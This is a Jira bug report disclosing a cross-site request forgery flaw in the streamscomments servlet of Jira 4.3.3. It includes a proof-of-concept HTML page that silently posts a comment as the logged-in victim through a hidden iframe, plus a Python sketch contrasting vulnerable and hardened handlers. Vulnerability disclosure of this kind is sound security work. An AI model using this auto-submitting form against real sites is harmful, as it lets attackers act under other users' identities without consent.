Cross-Site Request Forgery


    • Type: Bug
    • Resolution: Duplicate
    • Priority: Highest
    • Affects Version/s: 4.3.3
    • Component/s: None
    • Environment:

      Standalone version. The JDK version is sun-java6-jre on a 6.24-1~squeeze1 (Debian).

    • 4.03

      Cross-Site Request Forgery

      Security auditing tests performed on a locally running instance of the Jira Bug Issue and Project Tracking Software showed that the application is susceptible to Cross-Site Request Forgery attacks at this URL:

      [/jira/plugins/servlet/streamscomments]

      This vulnerability enables an attacker to post comments inside an issue through the session of a valid user logged into the system. Comments are signed by the logged-in user and can be posted without their consent.

      The first image outlined below describes where the attack has been performed, the second image describes an example of the code used to trigger the Cross-Site Request Forgery and the third image describes the result of the attack:

      Furthermore, the complete source code of an example Cross-Site Request Forgery HTML file can be found below:

      <html>
      <head>
      <TITLE>..:: TEMPEST XSRF ::..</TITLE>
      </head>
      <body onload="document.formXSRF.submit()">
      
      <center>
      	.:: TEMPEST ::.
      	<br>
      	<br>
      	<img src="data:image/jpeg;base64,[base64 image data removed]" />
      </center>
      
      <div style="display:none">
        <iframe name="framePost" > </iframe>
      </div>
      
      <form name="formXSRF" 
      action="http://jiradomain/jira/plugins/servlet/streamscomments" 
      method="post" target="framePost">
      <input type='hidden' name='replyTo' value='http://jiradomain/jira/plugins/servlet/streamscomments/TEMPEST-8415'>
      <input type='hidden' name='comment' value='Teste de CSRF por Ederson'>
      </form>
      
      </body>
      </html>
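      The following Python sketch is an added example, not code from this report or from Atlassian: it models the streamscomments POST described above next to a hardened version with the two defences whose absence makes the request forgeable, a same-origin check on Origin/Referer and a per-session synchronizer token. The host jiradomain and issue key TEMPEST-8415 come from the report; the attacker origin, the user name and the field name csrf_token are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass
from urllib.parse import urlsplit

JIRA_ORIGIN = "http://jiradomain"  # placeholder host taken from the report's PoC
COMMENT_PATH = "/jira/plugins/servlet/streamscomments"
TOKEN_FIELD = "csrf_token"  # hypothetical form/session field name (assumption)

@dataclass
class Request:
    method: str
    path: str
    headers: dict  # request headers as the browser sent them
    form: dict     # POST body fields
    session: dict  # server-side session tied to the user's cookie

def vulnerable_post_comment(req: Request, store: list) -> int:
    """The behaviour the report describes: any authenticated POST is accepted."""
    if req.method != "POST" or req.path != COMMENT_PATH:
        return 404
    store.append((req.session["user"], req.form["replyTo"], req.form["comment"]))
    return 200

def hardened_post_comment(req: Request, store: list) -> int:
    """Same endpoint with a source-origin check and a synchronizer token."""
    if req.method != "POST" or req.path != COMMENT_PATH:
        return 404
    # 1. The request must originate from a page served by this Jira instance.
    src = urlsplit(req.headers.get("Origin") or req.headers.get("Referer", ""))
    if f"{src.scheme}://{src.netloc}" != JIRA_ORIGIN:
        return 403
    # 2. The form must carry the per-session token (constant-time comparison).
    expected = req.session.get(TOKEN_FIELD, "")
    if not expected or not hmac.compare_digest(req.form.get(TOKEN_FIELD, ""), expected):
        return 403
    store.append((req.session["user"], req.form["replyTo"], req.form["comment"]))
    return 200

def demo() -> tuple:
    """Constructed: the report's cross-site form post versus an in-app post."""
    session, store = {"user": "victim", TOKEN_FIELD: secrets.token_urlsafe(32)}, []
    fields = {"replyTo": f"{JIRA_ORIGIN}{COMMENT_PATH}/TEMPEST-8415", "comment": "Teste de CSRF"}
    forged = Request("POST", COMMENT_PATH, {"Origin": "http://attacker.example"}, fields, session)
    legit = Request("POST", COMMENT_PATH, {"Origin": JIRA_ORIGIN},
                    {**fields, TOKEN_FIELD: session[TOKEN_FIELD]}, session)
    return (vulnerable_post_comment(forged, store), hardened_post_comment(forged, store),
            hardened_post_comment(legit, store), len(store))
```

demo() returns (200, 403, 200, 2): the unprotected handler stores the forged comment under the victim's session, while the hardened one rejects it and still accepts the application's own form.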
      

      Attachments:
        1. xx_resultadoCSRF.png (108 kB)
        2. pontoCsrfJira.png (106 kB)
        3. fontCode.png (185 kB)

              Assignee: Unassigned
              Reporter: João Paulo Lins
              Votes: 0
              Watchers: 0